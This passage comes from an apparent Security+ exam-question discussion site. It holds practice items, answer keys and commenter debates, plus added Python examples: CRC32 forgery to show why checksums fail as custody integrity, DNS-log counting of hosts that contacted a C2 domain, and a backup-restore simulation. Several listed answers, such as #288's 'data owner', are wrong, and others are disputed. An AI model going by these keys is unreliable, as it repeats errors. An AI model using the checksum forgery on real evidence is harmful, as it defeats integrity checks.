C. The provenance of the artifacts

Explanation:
A digital forensics chain-of-custody form is a document that provides a clear and complete record of the sequence of events that occurs from the
time a digital artifact is collected until it is analyzed and used as evidence. The form should include the date and time when the artifact was
collected, so that the exact time it was obtained can be determined. Additionally, the form should include information about the provenance of
the artifact, such as its origin and any steps that have been taken to maintain its integrity. The order of volatility, a CRC32 checksum, the vendor’s
name, and a warning banner are not essential components of a digital forensics chain-of-custody form.
upvoted 2 times

carpathia 2 months, 1 week ago
Again on the CRC32 checksum, it can't be an answer; read the table on CRC and hash:

https://www.researchgate.net/publication/279174845_Im_Proving_Chain_of_Custody_and_Digital_Evidence_Integrity_with_Time_Stamp
upvoted 1 times

carpathia 2 months, 1 week ago
CRC32 checksum is not a hash. I am still not sure.

What a form should contain:

What is the evidence?: For example- digital information includes the filename, md5 hash, and hardware information includes serial number, asset
ID, hostname, photos, description.
How did you get it?: For example- Bagged, tagged or pulled from the desktop.
When was it collected?: Date, Time
Who has handled it?
Why did that person handle it?
Where was it stored?: This includes the information about the physical location in which proof is stored or information of the storage used to
store the forensic image.
How did you transport it?: For example- in a sealed static-free bag, or in a secure storage container.
How was it tracked?
How was it stored?: For example- in a secure storage container.
Who has access to the evidence?: This involves developing a check-in/ check-out process.
upvoted 1 times

BluEric 2 months, 3 weeks ago
Selected Answer: BE
Integrity and Time Stamps - BE work for me here.
upvoted 1 times

carpathia 2 months, 3 weeks ago
Selected Answer: CE
I would go with CE. Who collected the evidence (if that what is meant by provenance) and time has to be recorded. Digest/Hash has to be
recorded, but CRC is not a hash as it is reversible. God help us...
upvoted 4 times

Sandon 1 week, 2 days ago
This is the one
upvoted 1 times

kausalya2022 2 months, 3 weeks ago
Selected Answer: BE
Checksum for integrity
upvoted 1 times

Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: CE
CE would be my preferred option too. "A" is important for the forensic analyst gathering the data, but not for the chain of custody.
upvoted 1 times

comeragh 2 months, 3 weeks ago
Selected Answer: AE
Going for A&E here. This was from old bank of questions.
upvoted 2 times

ksave 2 months, 3 weeks ago
Selected Answer: CE
Order of Volatility is for collecting the most volatile evidence first for data acquisition. It should not be in the chain of custody form.
upvoted 2 times

kstevens11 2 months, 3 weeks ago
Selected Answer: CE
I would go with E for sure, as date and time is crucial. Then, option C for provenance of the data -- NIST defines provenance as "The chronology
of the origin, development, ownership, location, and changes to a system or system component and associated data". Source --
https://csrc.nist.gov/glossary/term/provenance#:~:text=Definition(s)%3A,%2C%20component%2C%20or%20associated%20data.
upvoted 4 times
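Why the CRC32 option in this question is not an integrity control, and what a custody entry should carry instead, as an added example that is not code from the ExamTopics page or from any forensic tool: the first function appends four bytes to a tampered file so that its CRC32 equals whatever value the form already lists (a direct consequence of the CRC's linearity over GF(2)), and the second builds a record with the fields the answer names, a UTC timestamp and the provenance, around a SHA-256 digest that cannot be matched this way. The evidence bytes, item ID and examiner name are constructed.

```python
"""Chain-of-custody record fields, and why CRC32 is not one of them.

Added example, not from the ExamTopics page.  The evidence bytes, item ID and
names below are constructed.
"""
import hashlib
import zlib
from datetime import datetime, timezone

_POLY = 0xEDB88320  # reflected CRC-32 polynomial, as used by zlib


def _crc_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ _POLY if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _crc_table()
# Every table entry has a distinct top byte, so the top byte of a register
# value tells which entry was XORed in last.  That is what makes the final
# state walkable backwards.
_REV = {t >> 24: i for i, t in enumerate(_TABLE)}
if len(_REV) != 256:
    raise RuntimeError("CRC table top bytes are not distinct")


def crc32_of(data: bytes) -> int:
    return zlib.crc32(data)


def forge_crc32(data: bytes, target: int) -> bytes:
    """Return data plus four bytes whose CRC32 equals `target`.

    With four free bytes every 32-bit register value is reachable, so a
    tampered file can be given any checksum a custody form lists.
    """
    state = zlib.crc32(data) ^ 0xFFFFFFFF   # internal register after `data`
    want = target ^ 0xFFFFFFFF               # register value that yields `target`
    # Walk the desired register backwards to recover the four table indices.
    idx = [0] * 4
    for i in range(3, -1, -1):
        idx[i] = _REV[want >> 24]
        want = ((want ^ _TABLE[idx[i]]) << 8) & 0xFFFFFFFF
    # Replay forwards from the real state to find the bytes that hit those indices.
    patch = bytearray()
    for i in range(4):
        b = (state ^ idx[i]) & 0xFF
        patch.append(b)
        state = _TABLE[(state ^ b) & 0xFF] ^ (state >> 8)
    return data + bytes(patch)


def custody_record(evidence: bytes, item_id: str, collected_by: str, source: str) -> dict:
    """What, from where, when, by whom, and a cryptographic hash of the bytes."""
    return {
        "item_id": item_id,
        "provenance": source,
        "collected_by": collected_by,
        "collected_at": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "sha256": hashlib.sha256(evidence).hexdigest(),
        "size_bytes": len(evidence),
    }


def verify_record(evidence: bytes, record: dict) -> bool:
    """Re-hash the evidence; any change to the bytes fails this check."""
    return hashlib.sha256(evidence).hexdigest() == record["sha256"]


if __name__ == "__main__":
    original = b"disk image of workstation WS-042 (constructed sample)"
    tampered = b"disk image of workstation WS-042 (altered by attacker)"
    forged = forge_crc32(tampered, crc32_of(original))
    print("CRC32 still matches after tampering:", crc32_of(forged) == crc32_of(original))
    rec = custody_record(original, "EV-001", "J. Analyst", "WS-042, imaged on site")
    print("SHA-256 still matches after tampering:", verify_record(forged, rec))
```

The four patch bytes can be placed anywhere in the file that the format ignores, not only at the end, so a CRC on a custody form proves nothing against a deliberate change. A SHA-256 (or another collision-resistant hash) recorded together with the collection time and the provenance is what later handlers re-compute and sign for.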

Question #278 Topic 1

An organization is migrating several SaaS applications that support SSO. The security manager wants to ensure the migration is completed
securely. Which of the following application integration aspects should the organization consider before focusing on underlying implementation
details? (Choose two.)

A. The back-end directory source

B. The identity federation protocol

C. The hashing method

D. The encryption method

E. The registration authority

F. The certificate authority

Correct Answer: BD

Community vote distribution: BF (55%) BE (27%) AB (18%)

atrax [Highly Voted] 2 months, 3 weeks ago
Selected Answer: BF
Certification covers both encryption and hashing
upvoted 6 times

ksave [Highly Voted] 2 months, 3 weeks ago
Shouldn't it be B and F? F would cover both the encryption and hashing method.
upvoted 5 times

ronniehaang [Most Recent] 3 days, 22 hours ago
Selected Answer: AB
The organization should consider the identity federation protocol and the back-end directory source before focusing on underlying
implementation details during migration of several SaaS applications that support SSO.

A. Identity Federation Protocol: The identity federation protocol helps in establishing trust between different organizations and systems for secure
exchange of identity information between them. This helps to securely integrate multiple applications that support SSO and facilitates secure
authentication of the users.

B. Back-end Directory Source: A back-end directory source is used to store user identities and credentials and to perform authentication of the
users. The organization needs to consider the integration of back-end directory sources of the SaaS applications with its existing infrastructure,
to ensure secure and seamless migration of the SaaS applications.
upvoted 2 times

GetBuckets 1 month, 3 weeks ago
I’d go B & F here.
upvoted 4 times

FMMIR 1 month, 3 weeks ago
Selected Answer: BE
I believe it’s B & E

The organization should consider the identity federation protocol and the registration authority before focusing on underlying implementation
details. These aspects are related to how the applications will integrate with each other and with the organization's existing single sign-on (SSO)
infrastructure. The identity federation protocol is the standard that will be used to communicate between the applications and the SSO system,
while the registration authority is the entity responsible for registering the applications with the SSO system and managing their access to the
system.
upvoted 3 times

Question #279 Topic 1

A security analyst has been tasked with finding the maximum amount of data loss that can occur before ongoing business operations would be
impacted. Which of the following terms BEST defines this metric?

A. MTTR

B. RTO

C. RPO

D. MTBF

Correct Answer: C

Community vote distribution: C (100%)

yasuke [Highly Voted] 2 months, 3 weeks ago
Recovery point objective (RPO) is the maximum acceptable amount of data loss after an unplanned data-loss incident, expressed as an amount
of time. This is generally thought of as the point in time before the event at which data can be successfully recovered -- that is, the time elapsed
since the most recent reliable backup.
upvoted 9 times

no_name_ [Highly Voted] 2 months, 2 weeks ago
Selected Answer: C
I don't think whoever marked the "right" answers has passed this exam
upvoted 6 times

atrax [Most Recent] 2 months, 3 weeks ago
Selected Answer: C
C, RPO is about data.
upvoted 2 times

Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: C
Recovery point objective (RPO) is the correct answer
upvoted 2 times

IzzyLeon 2 months, 3 weeks ago
RPO is your goal for the maximum amount of data the organization can tolerate losing.

MTBF is the average time between system breakdowns.

Question is asking for maximum amount of data loss that can occur before impacting business.
upvoted 1 times

ksave 2 months, 3 weeks ago
Selected Answer: C
RPO-->acceptable downtime
upvoted 2 times

Question #280 Topic 1

The IT department's on-site developer has been with the team for many years. Each time an application is released, the security team is able to
identify multiple vulnerabilities. Which of the following would BEST help the team ensure the application is ready to be released to production?

A. Limit the use of third-party libraries.

B. Prevent data exposure queries.

C. Obfuscate the source code.

D. Submit the application to QA before releasing it.

Correct Answer: D

Community vote distribution: D (100%)

pgonza 1 month, 4 weeks ago
Selected Answer: D
QA is quality assurance, so if the apps always have bugs, let the QA team view before releasing.
upvoted 1 times

03allen 2 months, 3 weeks ago
Fire the developer 😁
upvoted 4 times

comeragh 2 months, 3 weeks ago
Selected Answer: D
Agree with D here. This was from the old bank of questions also.
upvoted 3 times

Question #281 Topic 1

During a security incident investigation, an analyst consults the company’s SIEM and sees an event concerning high traffic to a known, malicious
command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which
of the following can provide this information?

A. WAF logs

B. DNS logs

C. System logs

D. Application logs

Correct Answer: B

Community vote distribution: B (67%) C (33%)

rodwave [Highly Voted] 2 months, 3 weeks ago
Selected Answer: B
Answer: DNS

DNS logs can contain a record for every query and response. It can show the IP addresses and domain names that your system should/shouldn't
be communicating with, it can reveal malware calling out to its command-and-control server, or data transfers to non-company locations. This is
one of the reasons why DNS logs are some of the most valuable logs to import into a SIEM system.
upvoted 10 times

lizb7223 3 weeks, 1 day ago
DNS logs
https://www.geeksforgeeks.org/top-9-common-security-log-sources/?ref=gcse
number 9 states that DNS logs do address command and control as well.
upvoted 1 times

Lv2023 [Most Recent] 1 month, 2 weeks ago
Selected Answer: B
DNS event logs can hold a variety of information that may supply useful security intelligence, such as:
The types of queries a host has made to DNS.
Hosts that are in communication with suspicious IP address ranges or domains.
upvoted 1 times

johnajwer 2 months, 2 weeks ago
Selected Answer: C
Answer is C
B is incorrect as we are dealing with a command-and-control server. System logs are vital for this.
upvoted 2 times

Sandon 2 months, 1 week ago
Why does that change the answer? Seems like DNS logs would still tell you which workstations connected to it.
upvoted 2 times

Sandon 1 week, 2 days ago
I take it back, you're correct
upvoted 1 times

carpathia 2 months, 3 weeks ago
Selected Answer: B
DNS logs would contain that info. System logs don't necessarily.
upvoted 3 times

atrax 2 months, 3 weeks ago
Selected Answer: C
System logs or Syslogs is correct.
upvoted 2 times

ksave 2 months, 3 weeks ago
Selected Answer: C
System logs contain logs from multiple sources and therefore should provide all the impacted workstations.

upvoted 3 times
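How an analyst would actually pull that number out of DNS logs, as an added example that is not part of the ExamTopics page: the code parses constructed BIND-style query-log lines, matches the indicator domain and its subdomains case-insensitively (ignoring a trailing dot), and counts distinct client addresses. The log lines, the domain `update-cdn-metrics.example` and every IP address in them are made up.

```python
"""Count the workstations that resolved a known C2 domain, from DNS query logs.

Added example, not code from the ExamTopics page.  The log lines follow the
BIND query-log layout but are constructed; hosts, domain and addresses are
invented.
"""
import re
from collections import defaultdict

# Assumed indicator from threat intelligence (constructed domain).
C2_DOMAINS = {"update-cdn-metrics.example"}

# Constructed sample: three clients resolve the C2 domain (one of them twice,
# one via a subdomain, one with mixed case and a trailing dot); one client
# only looks up unrelated names.
DNS_LOG = """\
12-Jan-2023 09:14:02.113 queries: info: client 10.20.30.41#51522 (update-cdn-metrics.example): query: update-cdn-metrics.example IN A + (10.20.0.5)
12-Jan-2023 09:14:05.551 queries: info: client 10.20.30.42#60331 (www.example.org): query: www.example.org IN A + (10.20.0.5)
12-Jan-2023 09:15:10.007 queries: info: client 10.20.30.41#51523 (update-cdn-metrics.example): query: update-cdn-metrics.example IN A + (10.20.0.5)
12-Jan-2023 09:16:44.902 queries: info: client 10.20.30.57#49812 (UPDATE-CDN-METRICS.example.): query: UPDATE-CDN-METRICS.example. IN A + (10.20.0.5)
12-Jan-2023 09:17:01.220 queries: info: client 10.20.30.99#40001 (api.update-cdn-metrics.example): query: api.update-cdn-metrics.example IN AAAA + (10.20.0.5)
12-Jan-2023 09:18:30.415 queries: info: client 10.20.30.42#60340 (mail.example.org): query: mail.example.org IN MX + (10.20.0.5)
"""

QUERY = re.compile(
    r"client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})#\d+ .*?query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def normalise(name):
    """Lower-case and strip the trailing dot so 'Foo.Example.' equals 'foo.example'."""
    return name.lower().rstrip(".")


def matches_indicator(qname, indicators):
    """True if qname is an indicator domain or a subdomain of one.

    A plain substring test would also flag 'notupdate-cdn-metrics.example',
    so the comparison is anchored on a label boundary.
    """
    q = normalise(qname)
    return any(q == d or q.endswith("." + d) for d in map(normalise, indicators))


def impacted_clients(log_text, indicators):
    """Return {client_ip: [names queried]} for clients that resolved an indicator."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY.search(line)
        if m and matches_indicator(m.group("qname"), indicators):
            hits[m.group("ip")].append(normalise(m.group("qname")))
    return dict(hits)


def impacted_count(log_text, indicators):
    """The number the analyst in the question is after: distinct clients."""
    return len(impacted_clients(log_text, indicators))


if __name__ == "__main__":
    for ip, names in sorted(impacted_clients(DNS_LOG, C2_DOMAINS).items()):
        print(f"{ip}: {len(names)} lookup(s) of {sorted(set(names))}")
    print("workstations to triage:", impacted_count(DNS_LOG, C2_DOMAINS))
```

The count answers the question as asked, with the caveat the thread touches on: a DNS log shows which hosts resolved the C2 name, not which ones completed a connection, and a host that uses a hard-coded IP, DNS over HTTPS or an external resolver never appears here. Firewall, proxy or NetFlow records keyed on the server's address close that gap; the system logs some commenters prefer only help if the endpoints' own network telemetry is being collected centrally.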

Question #282 Topic 1

A company has a flat network that is deployed in the cloud. Security policy states that all production and development servers must be
segmented. Which of the following should be used to design the network to meet the security requirements?

A. CASB

B. VPC

C. Perimeter network

D. WAF

Correct Answer: B

Community vote distribution: B (100%)

okay123 [Highly Voted] 2 months, 2 weeks ago
VPC: Virtual private cloud, ohh! See, the hardest part is just memorizing all these damn acronyms, argh!
upvoted 10 times

okay123 1 month, 3 weeks ago
Ameen sister! this keeps happening argh
upvoted 3 times

IzzyLeon [Most Recent] 2 months, 3 weeks ago
Selected Answer: B
"Security policy states that all production and development servers must be segmented" which can be achieved by using a VPC
upvoted 1 times

ksave 2 months, 3 weeks ago
Selected Answer: B
VPC consists of cloud resources isolated from other cloud resources.
upvoted 3 times

Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: B
VPC should be the right answer here, as you could use multiple VPCs within your cloud environment to segment the network
upvoted 1 times

kstevens11 2 months, 3 weeks ago
Selected Answer: B
My thoughts are that a VPC offers segmentation in a cloud environment.
upvoted 3 times

Question #283 Topic 1

A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to
protect the PC from malicious files on the storage device?

A. Change the default settings on the PC.

B. Define the PC firewall rules to limit access.

C. Encrypt the disk on the storage device.

D. Plug the storage device in to the UPS.

Correct Answer: C

Community vote distribution: C (57%) A (33%) 10%

rodwave [Highly Voted] 2 months, 3 weeks ago
Selected Answer: C
Answer: Encrypt the disk on the storage device.

Encrypting the disk on the drive could work because if the files on the storage drive are encrypted, that means the data will be in a format that can't
be used by other devices anyway.

The PC is in a corporate environment so they're likely using Active Directory where they can implement a GPO to encrypt removable drives when
plugged in to a PC using BitLocker.

Just to note, I don't think "A" is wrong because I'm pretty sure windows has that AutoPlay function where you could automatically run certain
files or even install software when something plugged in but I'm pretty sure it's not a default setting sort of thing.

Anyway, this is the last question in the review for me and I'm scheduled to take my test in a few days so good luck to you guys and wish me luck
:)
upvoted 14 times

VHuckle 2 days, 18 hours ago
I'm sorry, but encrypting the device does NOTHING to stop the activation of any malicious code on the device. Note the question states "A
new plug and play device was installed..." It's already connected, and the instant it made contact, any malicious code would execute before
the encryption could complete.

All encryption does is prevent the data from being read/accessed AFTER REMOVAL.
upvoted 2 times

SOK_I 2 months, 2 weeks ago
Good luck man. Though, you've already taken it by this point. Just wanted to say how grateful I am that you leave such detailed posts. You
and Stoneface are my heros. Gonna be testing tomorrow, really relying on both of you guys. Thank you for what you've done here.
upvoted 2 times

ronniehaang [Most Recent] 3 days, 22 hours ago
Selected Answer: A
A. Change the default settings on the PC.

To protect the PC from malicious files on the storage device, it is best to change the default settings on the PC. This includes enabling antivirus
software, configuring software and hardware firewalls, enabling automatic updates, and setting up access controls to prevent unauthorized users
from accessing the PC. By changing the default settings, the PC can be better protected against malicious files and other security threats,
including those on the storage device. Additionally, the PC should have up-to-date virus definition files and other security software to detect and
prevent malicious files from executing on the PC.
upvoted 2 times

madmax1984 2 weeks, 2 days ago
Selected Answer: C
Data encryption protects data wherever it lives. Once data is encrypted and the encryption key is secured, the data becomes useless to any
cybercriminal. If that data is already encrypted, that makes it much more difficult for the malware to detect it and attack.
upvoted 1 times

Jimbobilly 1 month, 3 weeks ago
Selected Answer: B
One way to protect a PC from malicious files on a storage device is to define the firewall rules on the PC to limit access. This can help to prevent
unauthorized access to the PC from the storage device, and can help to prevent the spread of malware or other malicious files.
upvoted 2 times

FMMIR 1 month, 3 weeks ago
Selected Answer: B
To protect the PC from malicious files on the storage device, the best option is to define the PC firewall rules to limit access. By configuring the
firewall on the PC to block incoming and outgoing traffic from unknown sources, the company can prevent malicious files on the storage device
from communicating with the internet and infecting the PC. This will help to safeguard the PC against malware and other threats that may be
present on the storage device.
upvoted 1 times

HL2020 1 month, 4 weeks ago
Selected Answer: A
Got to be A. I don't see the others making sense. Encrypting the plug and play device wouldn't seem to protect the PC.
upvoted 4 times

JakeBusey 2 months ago
Selected Answer: A
A

Change default settings refers to disabling autorun.

What is encryption going to prevent in this scenario? Case in point, enable BitLocker or FileVault on your OS drive and then plug a USB flash
drive into the computer.

Can the USB drive communicate with the encrypted OS drive? Yes.
Can they see each other's files? Yes.
So what does this prevent? Nothing.

Encryption would be great if someone were to remove the drive from your computer and try to read the data off of it. But when you're actively
using the computer, the drive is UNLOCKED.
upvoted 3 times

carpathia 2 months, 3 weeks ago
Selected Answer: A
"plug-and-play storage device" this would point to A, even though these types of hints may be both helpful and misleading.
upvoted 1 times

carpathia 2 months, 3 weeks ago
I am not sure how encrypting a disk would protect against malware execution. I have seen this on q 267 by encrypting a usb stick upon
insertion. OK, there may be policies set by the admin to encrypt a storage device or usb stick to avoid malicious use? Someone who worked
in the field can help us out. I haven't heard of this sort of thing
upvoted 1 times

nobnarb 2 months, 3 weeks ago
Selected Answer: C
I don't know for sure, but I have been studying Sec+ for 5 months and test in 1 week. This is the best answer I could find.
upvoted 2 times

comeragh 2 months, 3 weeks ago
Taking the exam in a little over 10 hours. See you on the other side :)
upvoted 4 times

no_name_ 2 months, 3 weeks ago
I think it's C too. I think I'll take mine next week, let us know what your score is and how the PBQ's go! GL
upvoted 1 times

comeragh 2 months, 3 weeks ago
I found my old bank of old questions and I had this as C. Open for discussion.
upvoted 1 times

comeragh 2 months, 3 weeks ago
Other sites listing A as the correct answer here. Taking the exam tomorrow 10/11.
upvoted 2 times

no_name_ 2 months, 3 weeks ago
I agree, I'm thinking A, it doesn't have to go through a firewall, a firewall would work for something with an air gap. I could be mistaken
though, somebody feel free to let me know if I'm wrong. Let us know how you do bro.
upvoted 1 times

Question #284 Topic 1

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the
following solutions would BEST support the policy?

A. Mobile device management

B. Full-device encryption

C. Remote wipe

D. Biometrics

Correct Answer: A

Community vote distribution: A (100%)

diegomatheus00 2 weeks ago
Selected Answer: A
MDM -> Correct
upvoted 1 times

techygirl 2 months ago
Selected Answer: A
MDM is correct
upvoted 2 times

Question #285 Topic 1

A company wants to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss.
Which of the following would be the BEST backup strategy to implement?

A. Incremental backups followed by differential backups

B. Full backups followed by incremental backups

C. Delta backups followed by differential backups

D. Incremental backups followed by delta backups

E. Full backups followed by differential backups

Correct Answer: E

Community vote distribution: E (100%)

Ranaer 2 days, 23 hours ago
Selected Answer: E
The correct answer here is to use differential backup. When using this type of back up, there are two alternatives:
1 - Something bricks on the day of the full backup, you need only that full backup to restore your system.
2 - Something bricks after the day when a full backup is conducted. In that case you only need two things, the full backup and the most recent
differential backup.

With incremental you need your full backup followed by every single backup made since then till the point of failure.
upvoted 1 times

Sandon 1 week, 2 days ago
It's B
upvoted 1 times

madmax1984 2 weeks, 2 days ago
Selected Answer: E
Answer is E
upvoted 1 times

GetBuckets 1 month, 3 weeks ago
That’s E. Full backup followed by differential backups.
upvoted 1 times

GetBuckets 1 month, 3 weeks ago
With differential backup, you only need the latest differential backup + the original full backup. With incremental, you will need all the
incremental backups (could be too many) + the original backup. Refer to Ian Neil’s book (Figure 12.10) which explains it perfectly.
upvoted 2 times

GetBuckets 1 month, 3 weeks ago
With incremental, you will need all the incremental backups (could be too many) + the original FULL backup.
upvoted 1 times

nunulong 1 month, 4 weeks ago
As the question suggests reducing the number of backups that need to be restored in case of data loss: the most recent differential will be a
collection of all the changes since a full backup was done, whereas with incremental backups you have to load each individual incremental as well as
the full backup. I think the correct answer is E, which requires fewer backup files to restore the data.
upvoted 2 times

[Removed] 1 month, 4 weeks ago
Differential backups only back up the files that have changed since the previous full backup, while incremental backups do the same, they back
up the files that have changed since the previous incremental or full backup.

Either B or E? Open for discussion..
upvoted 1 times

JSOG 2 months ago
Selected Answer: E
Differential backups are quicker than full backups because so much less data is being backed up. But the amount of data being backed up
grows with each differential backup until the next full back up. Differential backups are more flexible than full backups, but still unwieldy to do
more than about once a day, especially as the next full backup approaches.
upvoted 2 times
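To make the restore-chain argument in the thread above concrete, here is an added example (not from ExamTopics or any commenter) that simulates five days of changes after a day-0 full backup under both strategies and lists which backup sets a restore needs; the file names and daily changes are constructed sample data.

```python
"""Simulate full+incremental vs full+differential backups and count what a restore needs."""
from typing import Dict, List, Tuple

State = Dict[str, str]  # file name -> content version

# Constructed sample data (not from the thread): the initial file set and the files
# that change on each of the five days after the day-0 full backup.
BASELINE: State = {"a.txt": "a0", "b.txt": "b0", "c.txt": "c0", "d.txt": "d0"}
DAILY_CHANGES: Dict[int, State] = {
    1: {"a.txt": "a1"},
    2: {"b.txt": "b2"},
    3: {"a.txt": "a3", "c.txt": "c3"},
    4: {"d.txt": "d4"},
    5: {"b.txt": "b5"},
}


def live_state(day: int) -> State:
    """What the disk looks like at the end of `day` (day 0 = the full backup)."""
    state = dict(BASELINE)
    for d in range(1, day + 1):
        state.update(DAILY_CHANGES.get(d, {}))
    return state


def build_backups(strategy: str) -> Dict[str, State]:
    """Produce the backup sets taken each day under the given strategy.

    'incremental': each daily set holds only the files changed since the previous
    backup of any kind, so every set stays small.
    'differential': each daily set holds every file changed since the last full
    backup, so the sets grow day by day but the newest one is self-sufficient.
    """
    if strategy not in ("incremental", "differential"):
        raise ValueError(f"unknown strategy {strategy!r}")
    backups: Dict[str, State] = {"full-0": dict(BASELINE)}
    since_full: State = {}
    for day in range(1, max(DAILY_CHANGES) + 1):
        changed = DAILY_CHANGES.get(day, {})
        since_full.update(changed)
        if strategy == "incremental":
            backups[f"inc-{day}"] = dict(changed)
        else:
            backups[f"diff-{day}"] = dict(since_full)
    return backups


def restore_chain(strategy: str, fail_day: int) -> List[str]:
    """Labels of the backup sets that must be restored, in order, after a failure
    at the end of `fail_day` (0 means only the full backup is needed)."""
    chain = ["full-0"]
    if fail_day == 0:
        return chain
    if strategy == "incremental":
        chain += [f"inc-{d}" for d in range(1, fail_day + 1)]   # full + every incremental
    else:
        chain.append(f"diff-{fail_day}")                         # full + latest differential
    return chain


def restore(strategy: str, fail_day: int) -> Tuple[State, List[str]]:
    """Rebuild the disk from the chain and return (restored_state, labels_used)."""
    backups = build_backups(strategy)
    chain = restore_chain(strategy, fail_day)
    state: State = {}
    for label in chain:  # later sets overwrite earlier versions of the same file
        state.update(backups[label])
    return state, chain


if __name__ == "__main__":
    for strategy in ("incremental", "differential"):
        state, chain = restore(strategy, 5)
        complete = state == live_state(5)
        print(f"{strategy:12s} day-5 restore needs {len(chain)} sets: {chain} (complete={complete})")
```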

Question #286 Topic 1

The compliance team requires an annual recertification of privileged and non-privileged user access. However, multiple users who left the
company six months ago still have access. Which of the following would have prevented this compliance violation?

A. Account audits

B. AUP

C. Password reuse

D. SSO

Correct Answer: A

Community vote distribution: A (100%)

ronniehaang 3 days, 22 hours ago
Selected Answer: A
A. Account audits would have prevented this compliance violation by periodically reviewing the access permissions of users and removing those
who are no longer with the company. An annual account audit would have identified the users who left the company six months ago and their
access could have been revoked to ensure compliance with the recertification requirement. The account audit would have verified the accuracy
of the access control lists and ensured that all access privileges are in line with current business requirements.
upvoted 1 times

Alizadeh 1 month, 1 week ago
Selected Answer: A
A. Account audits would have prevented this compliance violation.

Account audits are periodic reviews of user accounts to ensure that they are being used appropriately and that access is being granted and
revoked in accordance with the organization's policies and procedures. If the compliance team had been conducting regular account audits, they
would have identified the users who left the company six months ago and ensured that their access was revoked in a timely manner. This would
have prevented the compliance violation caused by these users still having access to the company's systems.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
To prevent this compliance violation, the company should implement account audits. An account audit is a regular review of all user accounts to
ensure that they are being used properly and that they are in compliance with the company's security policies. By conducting regular account
audits, the company can identify inactive or unused accounts and remove access for those users. This will help to prevent compliance violations
and ensure that only authorized users have access to the company's systems and data.
upvoted 1 times

JSOG 2 months ago
Selected Answer: A
Agree with A; if accounts were audited, they would know that there are some accounts that had to be deleted
upvoted 1 times

Question #287 Topic 1

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area.
Which of the following would MOST likely have prevented this breach?

A. A firewall

B. A device pin

C. A USB data blocker

D. Biometrics

Correct Answer: C

Community vote distribution: C (71%), D (29%)

FMMIR 1 month, 3 weeks ago
Selected Answer: C
A USB data blocker would most likely have prevented the data breach in this scenario. A USB data blocker is a device that blocks data transfer
over USB connections. It can be used to protect against attacks that involve connecting a malicious USB device, such as a charger or USB drive,
to a computer or other device. In this scenario, the executive was charging a phone in a public area and likely connected the phone to a USB
charging port. If the charging port had been equipped with a USB data blocker, it would have prevented any data transfer between the phone and
the charging port, and the breach would not have occurred. A firewall, device pin, or biometrics would not have prevented this type of attack.
upvoted 2 times

okay123 1 month, 3 weeks ago
Selected Answer: C
A USB data blocker allows you to plug into Wi-Fi hotspots and USB charging ports safely. These solutions eliminate the risk of infecting your
phone, laptop, or tablet with malware, and also prevent hackers from installing and running malicious code on your system.

It's DEF C!
upvoted 3 times

beb252 1 month, 4 weeks ago
Selected Answer: D
I haven't seen any phone with a USB yet.
upvoted 2 times

kirochey 3 days ago
USB charger?
upvoted 1 times

Ranaer 2 days, 23 hours ago
Quite literally every modern phone uses a USB cable? The time of chargers directly attached to the cable ended about 15 years ago.
upvoted 1 times

Question #288 Topic 1

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer
is an example of a __________.

A. data controller.

B. data owner.

C. data custodian.

D. data processor.

Correct Answer: B

Community vote distribution: C (69%), D (31%)

asum 2 weeks, 3 days ago
Selected Answer: C
As the CompTIA guide mentions:
Data custodian—this role handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures
upvoted 2 times

nicekoda 1 month, 1 week ago
The answer is C. Data Custodian is responsible for implementing and maintaining security controls for a given data set in order to meet the
requirements specified by the Data Owner in the Data Governance Framework
upvoted 1 times

Sanjucbsa 1 month, 2 weeks ago
Selected Answer: D
Data Processor: a computer or person that carries out operations on data to retrieve, transform, or classify information.
upvoted 1 times

Sandon 1 week, 2 days ago
No sir
upvoted 2 times

Jimbobilly 1 month, 3 weeks ago
Selected Answer: D
A data custodian is a person or entity that is responsible for maintaining and protecting data on behalf of the data owner.
upvoted 1 times

Jimbobilly 1 month, 3 weeks ago
In this scenario, the security engineer is responsible for applying encryption to the data on a hard disk. This makes the security engineer a
data processor, as they are processing the data on behalf of the data controller (the manager who is responsible for the data set).
upvoted 1 times

GetBuckets 1 month, 3 weeks ago
It’s D. The Data Processor. See this official link: https://www.legislation.gov.uk/eur/2016/679/article/32
upvoted 2 times

sauna28 1 month, 3 weeks ago
Selected Answer: D
Based on Professor Messer's video, I believe the answer is D
upvoted 1 times

kholdsnare 1 month, 3 weeks ago
Selected Answer: D
Manager who is responsible for a data set -> data owner
Data Processor – typically an entity that works under the direction of the owner/controller, such as an IT department.
The security engineer is a Data Processor in this case.
https://cissprep.net/data-ownership/
upvoted 2 times

JSOG 2 months ago
Selected Answer: C
agree with C
upvoted 1 times
FMMIR 2 months ago
Selected Answer: C
Data custodian: Responsible for the safe custody, transport, and storage of the data and implementation of business rules.
Data owner: Holds legal rights and complete control over data elements.
Data controller: The natural or legal person, public authority, agency, or any other body that alone or jointly with others determines the purposes
and means of the processing of personal data. Where the purposes and means of processing are determined by national or community laws or
regulations, the controller or the specific criteria for the nomination of the controller may be designated by national or community law.
Data processor: A natural or legal person, public authority, agency, or any other body that processes personal data on behalf of the controller.
There are situations where an entity can be a data controller, or a data processor, or both.
upvoted 3 times

FMMIR 1 month, 3 weeks ago
I did more research on this and the answer is D.

The security engineer who is tasked with encrypting the data on a hard disk is an example of a data processor. A data processor is an
individual or organization that processes personal data on behalf of a data controller. In this scenario, the manager who is responsible for the
data set is the data controller, and the security engineer is the data processor. The data processor is responsible for ensuring that the data is
processed in accordance with the instructions of the data controller and in compliance with any applicable laws or regulations. The security
engineer is not the data owner or data custodian in this scenario. The data owner is the individual or organization that has ultimate control
over the data, and the data custodian is responsible for physically storing and protecting the data.
upvoted 3 times

